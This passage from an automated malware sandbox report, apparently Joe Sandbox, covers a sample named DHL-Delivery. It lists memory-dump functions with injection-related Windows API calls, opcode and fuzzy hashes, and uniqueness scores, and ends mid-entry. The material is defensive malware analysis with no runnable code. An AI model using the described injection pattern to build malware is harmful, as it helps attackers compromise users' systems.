                        Download Yara Rule
                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: MemoryVirtualWrite
                        • String ID:
                        • API String ID: 3527976591-0
                        • Opcode ID: 9a3469f476e1ca74b20febc697e2bdfbb3c8c46adbee4a96f5c5037c973ea129
                        • Instruction ID: c1ee437d8fb9e5b599fd9572f65458f18d25a86be5f9aebd52c0261e6282fa4e
                        • Opcode Fuzzy Hash: 9a3469f476e1ca74b20febc697e2bdfbb3c8c46adbee4a96f5c5037c973ea129
                        • Instruction Fuzzy Hash: F6A121787C034AAEFF242D28CCB17E93267BF15380F954029ED9A97184D7A984D9CA42
                        Uniqueness

                        Uniqueness Score: 0.03%

                        Function 021A42DC, Relevance: 1.8, APIs: 1, Instructions: 304nativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: MemoryVirtualWrite
                        • String ID:
                        • API String ID: 3527976591-0
                        • Opcode ID: f703570bdb6e881de685853c851cf699c0df81b04239ab5b46a4d6a9a2423359
                        • Instruction ID: 25b60066d5b68308ddd4ca769800e771591834cff485b63ab0d377d8d08d2b77
                        • Opcode Fuzzy Hash: f703570bdb6e881de685853c851cf699c0df81b04239ab5b46a4d6a9a2423359
                        • Instruction Fuzzy Hash: BA9111787C034AAEFF245D68CCB17F97267BF14780F954029ED8A97184C7E988D9CA42
                        Uniqueness

                        Uniqueness Score: 0.03%

                        Function 021A4313, Relevance: 1.8, APIs: 1, Instructions: 293nativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: MemoryVirtualWrite
                        • String ID:
                        • API String ID: 3527976591-0
                        • Opcode ID: 38149484a2a7dcceac96b7463a77c77b0de691d9e3dbd9fbf3f3c6f344216f30
                        • Instruction ID: 6d8f712b43563b826c0c22a0a50b3c0a4662b6f4173342842ecc9c340c276959
                        • Opcode Fuzzy Hash: 38149484a2a7dcceac96b7463a77c77b0de691d9e3dbd9fbf3f3c6f344216f30
                        • Instruction Fuzzy Hash: A49112787C034AAEFF251D68CCB17F92267BF54780F954029ED8697184C7F988D9CA42
                        Uniqueness

                        Uniqueness Score: 0.03%

                        Function 021A4359, Relevance: 1.8, APIs: 1, Instructions: 287nativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: MemoryVirtualWrite
                        • String ID:
                        • API String ID: 3527976591-0
                        • Opcode ID: 6f85692eab50bd462f5e8142739a8140bdf1335bb4675003b22d01f5a96eb0d0
                        • Instruction ID: fe512c4999cf04649f01e712d10155ad1b308c6fcd6b5271cb5ce6c74323415a
                        • Opcode Fuzzy Hash: 6f85692eab50bd462f5e8142739a8140bdf1335bb4675003b22d01f5a96eb0d0
                        • Instruction Fuzzy Hash: 1D9156787C438AAEFF251D688CB17F92667BF15380F994029EDC697181C7E988C9C642
                        Uniqueness

                        Uniqueness Score: 0.03%

                        Function 021A3612, Relevance: 1.8, APIs: 1, Instructions: 284libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 4658739232947ea208339ce582738f8e8f7e1df05866eda04314fbad0b7c2800
                        • Instruction ID: e9bcef67570901ef765e252b084b2b286e0f83522df9cb01f1dba46ab141c414
                        • Opcode Fuzzy Hash: 4658739232947ea208339ce582738f8e8f7e1df05866eda04314fbad0b7c2800
                        • Instruction Fuzzy Hash: 2D8174BC6C4301ADEF352D688D7D7E762976F027B0FA24169DC9267182D365C4C6C913
                        Uniqueness

                        Uniqueness Score: 0.01%

                        Function 021A43DB, Relevance: 1.8, APIs: 1, Instructions: 259nativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: MemoryVirtualWrite
                        • String ID:
                        • API String ID: 3527976591-0
                        • Opcode ID: d98e09d33ad7ae77f9e59c29d49e85ce3294e44fe848c7ccd0d10c8c2c4d82de
                        • Instruction ID: 6b47cb6be60a2fa3d44126335a1fbeba603870157e2030b189f8359e91af27a9
                        • Opcode Fuzzy Hash: d98e09d33ad7ae77f9e59c29d49e85ce3294e44fe848c7ccd0d10c8c2c4d82de
                        • Instruction Fuzzy Hash: 828116787C034AAEFF351D688CB17F9226BBF14780F954029EDC697185C7E988D9C642
                        Uniqueness

                        Uniqueness Score: 0.03%

                        Function 021A442D, Relevance: 1.7, APIs: 1, Instructions: 242nativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: MemoryVirtualWrite
                        • String ID:
                        • API String ID: 3527976591-0
                        • Opcode ID: 779b05329d0362d93ae91f3a1be8132fc7cb65ee00af4d3a87ea744f32c0a6f3
                        • Instruction ID: 0661bc587da408a24bda0c3201b0c8ff11f32b0180a643a585e68a2c289c299d
                        • Opcode Fuzzy Hash: 779b05329d0362d93ae91f3a1be8132fc7cb65ee00af4d3a87ea744f32c0a6f3
                        • Instruction Fuzzy Hash: 507115787C034AAEFF391D689CB17F93267BF14780F954029EDC696184C7E988D9C642
                        Uniqueness

                        Uniqueness Score: 0.03%

                        Function 021AAB19, Relevance: 1.7, APIs: 1, Instructions: 232librarynativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        • Opcode ID: 5ce094ca7f2625430d07277b874f028ca3bd236e6cbf651eb782e35c083b1cbb
                        • Instruction ID: e97b64362ba6a31f680b28e7b0736acbed6a36d035bce602956b9b7e2c64734f
                        • Opcode Fuzzy Hash: 5ce094ca7f2625430d07277b874f028ca3bd236e6cbf651eb782e35c083b1cbb
                        • Instruction Fuzzy Hash: A361262D6CD286CEDF2D586489B43FA22739F66228FDB421BCCB387194D32685C5C653
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A4471, Relevance: 1.7, APIs: 1, Instructions: 231nativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: MemoryVirtualWrite
                        • String ID:
                        • API String ID: 3527976591-0
                        • Opcode ID: 37635e925f39ad638b69325f4c3b2f226687aaa775023f088a87342929a2ed0b
                        • Instruction ID: 99800f547f837fa2cfc58c0af66e2913839d4d4062cc916d464be5a746092ae9
                        • Opcode Fuzzy Hash: 37635e925f39ad638b69325f4c3b2f226687aaa775023f088a87342929a2ed0b
                        • Instruction Fuzzy Hash: 5E6125787C034AAEFF291D68DCB1BF92267BF14780F994025ED8696184C7E988D8C652
                        Uniqueness

                        Uniqueness Score: 0.03%

                        Function 021AAB45, Relevance: 1.7, APIs: 1, Instructions: 222librarynativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        • Opcode ID: 6cc647a812dd7030ac51f5cd9ee8b4b3769f5219ffc9525c82b6ef3e167ac092
                        • Instruction ID: f875080d314aaa1cc8fa4ec241e33f71fdf9ae9198d0d7d0d1c31fec169f56ad
                        • Opcode Fuzzy Hash: 6cc647a812dd7030ac51f5cd9ee8b4b3769f5219ffc9525c82b6ef3e167ac092
                        • Instruction Fuzzy Hash: 1851062D6CD346CEEF2D486489B43FA2272AF65228FD7421BCCB387194D32685C5C653
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A44C3, Relevance: 1.7, APIs: 1, Instructions: 219COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 95f20b27b257e9e752302a2892827f39a0046392566dd2dc257a4f077bd96a7e
                        • Instruction ID: 5c3591b7608b96f92c58d0bf74833120bd530233e122ca767692273b9be35cb4
                        • Opcode Fuzzy Hash: 95f20b27b257e9e752302a2892827f39a0046392566dd2dc257a4f077bd96a7e
                        • Instruction Fuzzy Hash: F96158787C034AAEFF251D68CCF17F92267BF14780F994025ED8697184C7EA88D8C652
                        Uniqueness

                        Uniqueness Score: 0.00%

                        Function 021AAB8F, Relevance: 1.7, APIs: 1, Instructions: 210librarynativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        • Opcode ID: 3e27d4ae8e36154fd12ceb4f519168001956b25ca29e31acb5b663c844d1d2a2
                        • Instruction ID: 85d7afd89492c384e4f98e2b4d1820c382718f0be866087e7c04b1c4f7b741e3
                        • Opcode Fuzzy Hash: 3e27d4ae8e36154fd12ceb4f519168001956b25ca29e31acb5b663c844d1d2a2
                        • Instruction Fuzzy Hash: 3B51F92D6CC246CEEF3D586489B43FA22729F65229FDB421BCCB387594D32685C5CA43
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A4504, Relevance: 1.7, APIs: 1, Instructions: 207nativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: MemoryVirtualWrite
                        • String ID:
                        • API String ID: 3527976591-0
                        • Opcode ID: d13bc4d9baac2471203b269c1f7de8c47e78f46d85befc6f349a655692b592de
                        • Instruction ID: e7b0f1abba1725ee2a845863069abe2fafeb4b435ee0c23839e45c47ab9acd6a
                        • Opcode Fuzzy Hash: d13bc4d9baac2471203b269c1f7de8c47e78f46d85befc6f349a655692b592de
                        • Instruction Fuzzy Hash: 915158787C034AAEFF251D68DCF17F92267BF14780F994025ED8697184C7E984D8C652
                        Uniqueness

                        Uniqueness Score: 0.03%

                        Function 021AABB3, Relevance: 1.7, APIs: 1, Instructions: 202librarynativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        • Opcode ID: de280a15c8e3f0bd45aadd46d1c15a2a8802cf3615acb764da4afcaa8b4ac858
                        • Instruction ID: 6e674095d541f048c70d87d9eda759da3761b25915b9c18e019749dd8494c5c4
                        • Opcode Fuzzy Hash: de280a15c8e3f0bd45aadd46d1c15a2a8802cf3615acb764da4afcaa8b4ac858
                        • Instruction Fuzzy Hash: 52510B2D6CD246CEEF3D586485B43FA2272AF65228FD7421BCCB387594D32685C5CA43
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021AABDD, Relevance: 1.7, APIs: 1, Instructions: 198librarynativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        • Opcode ID: 22e7c5c4dafee77b53050995f4b98d465d4bd4706a967dab742476deea5566d5
                        • Instruction ID: e1c975da01859a7c1d6b65f09b3289cf664b38b85bedf6672599a0a0ffed0008
                        • Opcode Fuzzy Hash: 22e7c5c4dafee77b53050995f4b98d465d4bd4706a967dab742476deea5566d5
                        • Instruction Fuzzy Hash: 3C51082D6CC246DEEF2D086489B43FA22729F65228FDB421BCCB387194D32685C5CA43
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021AABFD, Relevance: 1.7, APIs: 1, Instructions: 198librarynativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        • Opcode ID: 52120ce6a910bf754d4e83fe42770ae53ecd3064198c8b0f02ce4036699edad9
                        • Instruction ID: aba37fbdb4d8c653b1045de7a72080ebbc95a8cb6fb643e7c0d47ffc33cb67f8
                        • Opcode Fuzzy Hash: 52120ce6a910bf754d4e83fe42770ae53ecd3064198c8b0f02ce4036699edad9
                        • Instruction Fuzzy Hash: 75511A2D6CC246DDEF3D186489B43FA2272AF65228FDB421BCCB387594D32685C5CA43
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021AAC20, Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c5f19e7af6df4a96e0b4ea0b77ea2ffb46fb8e2401b4d05511a16a788859ffa8
                        • Instruction ID: a282f00eb50cf561ef7734f546bc718e2f92fb4fef5e4e1abfb2fe7f081fd6da
                        • Opcode Fuzzy Hash: c5f19e7af6df4a96e0b4ea0b77ea2ffb46fb8e2401b4d05511a16a788859ffa8
                        • Instruction Fuzzy Hash: 4D510A2D6CC246DDEF3D496489B43FA2272AF65228FDB421BCCB387594D32685C5CA43
                        Uniqueness

                        Uniqueness Score: 0.00%

                        Function 021AACD2, Relevance: 1.7, APIs: 1, Instructions: 197librarynativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        • Opcode ID: 5265fab4666b1e0a8c8bd4b7dbbb5778111ed08ac51f10f3983542c7cedc4662
                        • Instruction ID: ee0c9c8a3eb0b152a8f563b2e6cbd1ea0ba588f3ffbc5273a4e6580ac7e20fa8
                        • Opcode Fuzzy Hash: 5265fab4666b1e0a8c8bd4b7dbbb5778111ed08ac51f10f3983542c7cedc4662
                        • Instruction Fuzzy Hash: 21513B296CD382CDDF2D486489B43EA3272AF65628FDB425BCC7387190D37686C5CA53
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A45E3, Relevance: 1.7, APIs: 1, Instructions: 193nativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: MemoryVirtualWrite
                        • String ID:
                        • API String ID: 3527976591-0
                        • Opcode ID: 1e637911a849fc580c4f91142f8adcd8439e7e7aafd9e096ffc5bbfe336a7d0f
                        • Instruction ID: e605d0f95346d181270266653c6b2d2075eaf70fe5dcb3e3921834de2ed57798
                        • Opcode Fuzzy Hash: 1e637911a849fc580c4f91142f8adcd8439e7e7aafd9e096ffc5bbfe336a7d0f
                        • Instruction Fuzzy Hash: 9E5165797C1382AEEB255E78CCE17E83776BF15740F994029EC859B081C3A684D9C742
                        Uniqueness

                        Uniqueness Score: 0.03%

                        Function 021A454A, Relevance: 1.7, APIs: 1, Instructions: 192nativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: MemoryVirtualWrite
                        • String ID:
                        • API String ID: 3527976591-0
                        • Opcode ID: 00d2eb1b60a239e37f4216597d59f2f9a8e2ea15e95239d010fac6c6013e0823
                        • Instruction ID: 2f0d06be77b6c7d0090778f3262fc5d082e52ffbd386d2bd6d6f550426a27edc
                        • Opcode Fuzzy Hash: 00d2eb1b60a239e37f4216597d59f2f9a8e2ea15e95239d010fac6c6013e0823
                        • Instruction Fuzzy Hash: 3B5128787C034AAEFF251D68DCF07F92267BF14780F994029ED9697184C7E984D8C651
                        Uniqueness

                        Uniqueness Score: 0.03%

                        Function 021AAC4D, Relevance: 1.7, APIs: 1, Instructions: 191librarynativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        • Opcode ID: d4961ecaa0f2329e7d204d825ff2d95a9342a596f4080e92c3e6ff7849b7ac3c
                        • Instruction ID: 93b571f200cda1a1b6cbe888ed7f9c9c78f887b89bda5962954322d9fce7b641
                        • Opcode Fuzzy Hash: d4961ecaa0f2329e7d204d825ff2d95a9342a596f4080e92c3e6ff7849b7ac3c
                        • Instruction Fuzzy Hash: 2A51082D6CC246DDEF2D496489B43FA2272AF65229FDB421BCCB387190D32685C5CA43
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021AAC74, Relevance: 1.7, APIs: 1, Instructions: 190librarynativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        • Opcode ID: f4e369e6acca4d12329bdbaa3babf93e3bdeefc6ad8b64cb2e5584242188af20
                        • Instruction ID: bfd8b38e4504a1f1c8970e98f6fae1c8d140f53e1f3e72faa5106e57cbe7d600
                        • Opcode Fuzzy Hash: f4e369e6acca4d12329bdbaa3babf93e3bdeefc6ad8b64cb2e5584242188af20
                        • Instruction Fuzzy Hash: 5C511A2D6CC346DDDF2D496489B43FA2172AF65228FDB421BCCB387190D32685C5CA43
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021AACA0, Relevance: 1.7, APIs: 1, Instructions: 184librarynativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        • Opcode ID: 1af2d8369c35893ffe7a6299f6a2273ab1770821ad3090847d8bca21326af27f
                        • Instruction ID: 3e32eb3740db79d165e877fcd36da53059e9c2d920e560348270b803e512f1a9
                        • Opcode Fuzzy Hash: 1af2d8369c35893ffe7a6299f6a2273ab1770821ad3090847d8bca21326af27f
                        • Instruction Fuzzy Hash: 4A51E82D6CC246DDDF3D196489B83FA2272AF65229FDB421BCCB387190D32685C5CA43
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021AACB5, Relevance: 1.7, APIs: 1, Instructions: 182librarynativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        • Opcode ID: 65b0220148c9d4bfe0145e72983be2856b0c163fc940aa01aca821aa665ebb55
                        • Instruction ID: 1180e825c697ac03cc2f12390155d3a39c5935a4a3c2878929e9cc6505c855b2
                        • Opcode Fuzzy Hash: 65b0220148c9d4bfe0145e72983be2856b0c163fc940aa01aca821aa665ebb55
                        • Instruction Fuzzy Hash: 2451F8296CC345CDDF2D496489B43FA2272AF65229FDB421BCCB387190D36686C5CA43
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A462B, Relevance: 1.7, APIs: 1, Instructions: 178nativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: MemoryVirtualWrite
                        • String ID:
                        • API String ID: 3527976591-0
                        • Opcode ID: aee909deaefa6f37e7af986c37ab8fe942dafecaec20f2e615768d7b65159d2e
                        • Instruction ID: 6d045f27bda6d6437d0f7fea8b3aa0a5269b2850f7d6216d2bf650e9c113cf5a
                        • Opcode Fuzzy Hash: aee909deaefa6f37e7af986c37ab8fe942dafecaec20f2e615768d7b65159d2e
                        • Instruction Fuzzy Hash: 3A5165387C1386AEEF295E68CCF0BF833A7BF05350F994029ED9597084C7A984D8C642
                        Uniqueness

                        Uniqueness Score: 0.03%

                        Function 021A458D, Relevance: 1.7, APIs: 1, Instructions: 177nativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: MemoryVirtualWrite
                        • String ID:
                        • API String ID: 3527976591-0
                        • Opcode ID: 7b4df26cd8b05044dc44256fdb43f136e7d70a1f5bbd6db1cc22c7d638e91fbb
                        • Instruction ID: 29ff5218e5bfbe9974fc6a84fcb2b28fdb2903d78c45da56984c623b867c93f4
                        • Opcode Fuzzy Hash: 7b4df26cd8b05044dc44256fdb43f136e7d70a1f5bbd6db1cc22c7d638e91fbb
                        • Instruction Fuzzy Hash: 6D5117387C034AAEFF291D68CCF1BF92267BF14750F994029ED9697094C7A984D8CA51
                        Uniqueness

                        Uniqueness Score: 0.03%

                        Function 021AAE2E, Relevance: 1.7, APIs: 1, Instructions: 175librarynativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
